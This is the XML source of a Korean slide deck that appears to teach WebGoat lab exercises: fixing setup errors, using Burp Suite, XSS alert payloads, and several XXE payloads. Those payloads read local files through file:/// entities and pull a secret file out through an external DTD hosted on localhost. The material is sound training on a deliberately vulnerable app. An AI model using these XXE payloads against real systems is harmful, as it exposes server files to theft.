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260" r:id="rId3"/>
    <p:sldId id="259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1" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="274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E4F8-2E73-238E-6CFC-7AD55341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CB0D3-0FEA-0EEE-2E86-FC9AFB934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BBF6-AECD-178E-7700-EB918E2A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6729-BC27-C7EA-B148-3450A55F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B5FA-BFAD-8F0A-78E1-2694532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3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7E26-3073-61F9-BD48-51E9BE01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5793F-D05F-FFAB-E1B2-CF4B651F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0146-DFBC-1309-D551-38694DC5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89E12-779E-ECD8-6F3B-40A662EC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A44D-7101-4B0B-9412-011CC2D5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F1ECE-05B5-4367-B1DF-4EC751D1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8D82D-2FD1-BA8C-0D5A-42D58DB88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FA1C-FC0C-B4DC-8153-CF077E75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3E88-DB97-EE9F-4B33-EC636DC5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C44C-CD61-C229-D37D-5BD2AA44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1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01E6-9986-C35D-A49E-87348313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82D7-56C7-FAB5-54A7-B8A7D355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1757-0FD3-1E05-1A53-9510F261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768E1-6714-4885-6EE7-AE9B6547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47DB-29CD-9485-A55D-820A2DCF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C27-FAC0-52D3-3F34-499280AF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0CBF-D038-C307-2B2E-22E36A662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EB4B-37D6-EAB4-24FD-6E98650D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39B1-2AFA-D7C5-45D8-581330E03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ACB2-A06B-A2B4-9CAB-4E9C76A2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0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7D2-EDF4-F7F5-14DC-61A94493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EB62-6AD0-781D-F147-477598DD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6365C-DD1B-318A-8816-9022C4426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11A04-2538-2529-6922-E00E9AD3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E668-476D-AC8A-538D-6EEB589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1DE13-9C24-361D-244B-2001A09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31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9004-91E1-639B-780E-103A9E793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5276B-0024-C1E4-01A6-633752D1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ECD6E-AB3A-921C-B220-D4BA5E2D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644B0-A81E-DC3F-004E-437BF99A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F89C3-07BE-6AEB-F6F9-5998F81BF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1E5AD-69C9-4AF9-F0EA-495282F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DAD11-31D2-FB8C-0D1E-E30BA1A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64EB5-1CBD-74EE-90A4-9A0E836D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5CA3-5909-F645-0900-57C17294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29534-42DB-A825-F992-309D0834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B8EA-FEE2-FC94-F4F8-B05E6013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9AD10-778E-B7A4-9981-C7038B01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8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2B716-1EBF-0728-5686-65618B27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5D0BD-58BA-5703-05DA-CBB74C2D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968AA-186A-B236-42FC-2B784832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9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32C2-4812-FD61-5E25-C055DBC3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59C9-3A84-2F8A-94BE-D19D454C5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C0B4D-238B-A707-283B-7DDA50F05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4A68-947A-6C29-66DA-6CCBD4D7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8A4BB-7B90-BC99-2561-27ACA3E2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AD33-C4F6-404B-86A2-1AC26F9D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0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C2F4-0632-2EAA-C47D-5A160D23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FEB6A-0813-43B4-338F-02D737687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CE8C7-E163-92B6-4059-AD55091F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4310-5F97-ACEC-98EB-54E06D7D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C981-C3B8-FE4C-0180-322EA0E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126C3-97A2-3980-F9DD-27263065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52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41547-C8F4-110B-D960-77BEC7BB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038D-2425-3ADC-F780-16530B1D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EDDD-AFBC-C949-D53A-A5C2EAFA9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0D180-0FC0-4B6C-B9E8-FC2A8546B688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8953-48E5-BC8B-ED0C-EF5375CF1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686B-EF1B-5887-BCB9-D714BFBAA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E35A6-5B58-4494-8EA3-E519D91AA3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5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ilylearn.tistory.com/11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ntyourshit.com/webgoat-xxe-injection/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ssongkit.tistory.com/1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kysquirrel.tistory.com/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0D09E-780A-03A6-EF1A-0EB99650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89190-CC75-94F8-4EDA-89E6D7170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0BAEE-F833-CC2B-2466-668B36ECF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B3308-FD39-77B9-2AF8-2E5C39DC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602038"/>
            <a:ext cx="452500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0F49-826F-D7CF-6482-603C9F9B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공격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2BD0-2965-9316-0BAB-6E92B10C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ko-KR" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="ko-KR" dirty="0"/>
              <a:t>('hello')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="ko-KR" dirty="0"/>
              <a:t>)&lt;/script&gt;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76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6844-AC9B-3FFC-02F4-3F17F789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E342-48AB-E3E6-B237-71D1C677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D6A3-4EB4-0C3C-8770-B1D24833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https://dailylearn.tistory.com/115</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>https://dailylearn.tistory.com/113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70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560D-7C0D-568D-1081-8F9D9819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2E4-5928-BAF0-B102-7D16B1B9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문제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95A8B-20B8-C5D7-25E8-9D4E475F9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103"/>
            <a:ext cx="10515600" cy="1757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87F1F9-70BC-8597-3955-DF6B5D0BE65F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4513905" y="1946489"/>
            <a:ext cx="221057" cy="199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567D0-E8D0-1D77-1EEB-36B5627FA220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4513904" y="3075911"/>
            <a:ext cx="2095125" cy="1991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02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570A-DEB2-6D7F-36C7-6C5EF76F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Webwolf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>실행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4EF25-A7CE-4A02-7520-060B26864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0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2DBE-077D-A101-9EFF-AF6CB61A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위치 확인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0F69A-8A5F-6667-566A-F8849B449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7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8893-E5E2-488D-A77C-E2D175AB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185B-7D96-9FA4-9683-D523A57C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attack4.dtd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;!ENTITY secret SYSTEM 'file:///C:/Users/HOME/.webgoat-8.2.0/XXE/secret.txt'&gt;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1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D9E4E-CC39-8514-E2D3-C5BF22B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EB1DC-5E29-4021-A005-E1393CE2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244" y="1825625"/>
            <a:ext cx="80955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54C13-5AEC-FE46-818A-BB1246DDE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00EF-5BBA-5CA3-BE13-616D3969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번 문제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EB23C-C26F-7B3E-A539-B77360E90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103"/>
            <a:ext cx="10515600" cy="17573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F6C19-C7E2-9995-28E8-1A2A9B2057E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4513905" y="1946489"/>
            <a:ext cx="221057" cy="1991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240E7-4C0A-DC9D-B5D4-BFC5E2123F71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4513904" y="3075911"/>
            <a:ext cx="2095125" cy="1991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40685B-4EBF-21DF-3FA2-029877FE5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8822"/>
            <a:ext cx="4881704" cy="27502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0857C8-366A-B016-884F-049183CB6612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5402655" y="3718679"/>
            <a:ext cx="66022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&lt;?xml version="1.0" ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;!DOCTYPE root [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  &lt;!ENTITY % remote SYSTEM "http://localhost:9090/files/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>webgoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/attack4.dtd"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>%remote;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;comment&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  &lt;text&gt;&amp;secret;&lt;/text&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;/comment&gt;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56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EC9B-48F5-77E7-CB59-3BF3146C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35311-5986-357F-A16C-6AE65402B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381" y="1825625"/>
            <a:ext cx="41072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41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0CFF-3B66-3530-7B2E-65F57EB2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71BC-78B3-6C56-399B-41774465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https://ssongkit.tistory.com/134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https://inventyourshit.com/webgoat-xxe-injection/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>https://www.youtube.com/watch?v=fw6R85_O12k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AD1-B5E8-64A4-7A3E-CA06326B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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시작시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>hsql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>오류 발생시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5C9F-32A7-3B06-F2FF-474B6DB6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Hsql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r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>오류가 발생할 경우 특정한 프로젝트만을 선택하는 것이 아니라 전체에 대해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>maven update force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로 처리한다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9DFC2-A91F-233D-95B9-785291B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8" y="2886074"/>
            <a:ext cx="2976562" cy="38619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1C689-6F88-24BE-DCFD-EF17098D5284}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113573" y="4001294"/>
            <a:ext cx="280661" cy="8604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1C05A-42FA-618E-1FBB-C408CB34556B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="940567" y="5976931"/>
            <a:ext cx="280661" cy="2000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31BA-931B-B148-0B0B-FD096819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Response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>값 확인 방법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D0852-5378-4DDE-479B-79FB1024E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644" y="1493188"/>
            <a:ext cx="7641125" cy="52576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7252F-CD11-9400-55EC-CF3A1DF0AAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836815" y="1852565"/>
            <a:ext cx="607620" cy="1754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DC252-B680-9939-FCDC-8DF7AF352B1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303697" y="2457638"/>
            <a:ext cx="5486402" cy="1754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BB8F8-0F26-1C41-A915-BFDF59A4FEDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5115205" y="3957649"/>
            <a:ext cx="3820563" cy="22349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5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7E82-4F49-74FA-A7B0-B070D673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XXE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13ECAE-5885-E553-617A-9CBFF57AB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471" y="1825625"/>
            <a:ext cx="8137058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C3915-6227-D24B-9CDD-B76CE13EE9FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3675707" y="6391747"/>
            <a:ext cx="580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Burp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suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 전송해서 전송된 내용을 확인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D51DF-A5A8-71D8-2D1D-1087E90136F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475493" y="5863250"/>
            <a:ext cx="6689036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7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632B5A-F9A4-0D7A-6216-323FB2A8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096" y="1761414"/>
            <a:ext cx="5115639" cy="376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2678EF-EB99-B5CD-93F9-F3332FB5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331DC-BE70-BCDA-5B5B-EA00153BB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989896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7C74A3-469A-CFDA-BFAC-397AFB3B4ADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="838199" y="5015617"/>
            <a:ext cx="1081135" cy="5884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BD60D-CDB4-10B6-F4AD-1A1272D491DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3908833" y="4757457"/>
            <a:ext cx="8358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아래의 코드로 변경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&lt;?xml version="1.0"?&gt;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&lt;!DOCTYPE comment [ &lt;!ENTITY rootpath SYSTEM "file:///"&gt; ]&gt;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&lt;comment&gt; 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&lt;text&gt;&amp;rootpath;&lt;/text&gt;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&lt;/comment&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59609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AE11-32CE-993C-17A6-F651B9CD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추가적인 공격 코드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9B57-479D-1F41-ABF4-E30FE20D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&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;!DOCTYPE comment [ &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>rootpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> SYSTEM "../"&gt; ]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;comment&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>    &lt;text&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>rootpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>;&lt;/text&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;/comment&gt;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04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3C11-4198-1614-5779-15F5A0070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2591-A305-BEBE-D609-E5A66F9D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5023-100D-40E6-F5B7-AA4EABF4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https://skysquirrel.tistory.com/75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77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CBB0-B5C8-02B0-AE53-0927C1FB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5D2F-CDCC-C3B7-4222-8CED31C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8C7C0-790B-9358-D0DF-81CB8B506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45" y="1847910"/>
            <a:ext cx="10515600" cy="17355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6BCCEB-9828-B878-1067-32903F5F01E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2304860" y="1973651"/>
            <a:ext cx="356859" cy="3530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47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CCAEF-8845-CB76-4290-B36E2257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46BA-366C-8D1A-DBA7-7547764B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 내용을 수정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CE01-960D-96CE-C922-0BF49BDE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Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Content-Type: application/xml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{“text”:””}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>내용을 다음과 같이 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&lt;?xml version="1.0" standalone="yes" ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;!DOCTYPE comment [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  &lt;!ELEMENT comment (#PCDATA)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> SYSTEM "file:///c:/"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;comment&gt;&lt;text&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>;&lt;/text&gt;&lt;/comment&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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7DB16D-86A0-A2C6-1610-0CB994217A73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5066167" y="2190934"/>
            <a:ext cx="610356" cy="35308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C11253-C0F3-F3DD-5B54-49954C810640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="937787" y="3428999"/>
            <a:ext cx="6612803" cy="233805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351</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>55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Theme</vt:lpstr>
      <vt:lpstr>A4</vt:lpstr>
      <vt:lpstr>Spring boot 시작시 hsql오류 발생시</vt:lpstr>
      <vt:lpstr>Response값 확인 방법</vt:lpstr>
      <vt:lpstr>XXE</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>추가적인 공격 코드</vt:lpstr>
      <vt:lpstr>참고자료</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>Post 내용을 수정</vt:lpstr>
      <vt:lpstr>추가적인 공격</vt:lpstr>
      <vt:lpstr>참고자료</vt:lpstr>
      <vt:lpstr>11번 문제</vt:lpstr>
      <vt:lpstr>Webwolf실행</vt:lpstr>
      <vt:lpstr>파일 위치 확인</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>11번 문제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G_EDU02</dc:creator>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-18T12:08:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-19T00:02:32Z</dcterms:modified>
</cp:coreProperties>
</file>